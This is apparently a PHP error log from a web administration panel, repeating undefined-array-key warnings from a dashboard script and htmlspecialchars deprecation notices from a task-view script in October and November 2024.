[07-Oct-2024 11:23:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 11:51:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 11:53:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 12:26:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 13:39:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 17:37:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Oct-2024 20:11:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Oct-2024 11:14:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Oct-2024 12:49:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Oct-2024 15:05:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 10:26:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 12:30:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 12:34:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Oct-2024 14:54:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Oct-2024 11:54:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Oct-2024 11:05:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Oct-2024 11:08:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Oct-2024 12:00:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Oct-2024 16:10:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Oct-2024 16:33:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Oct-2024 10:36:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:09:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:09:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:11:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:25:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:38:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:48:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Oct-2024 15:49:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 17:52:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 17:54:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 17:59:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Oct-2024 18:01:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Oct-2024 10:49:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Oct-2024 12:32:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 00:59:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 00:59:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [07-Nov-2024 01:00:57 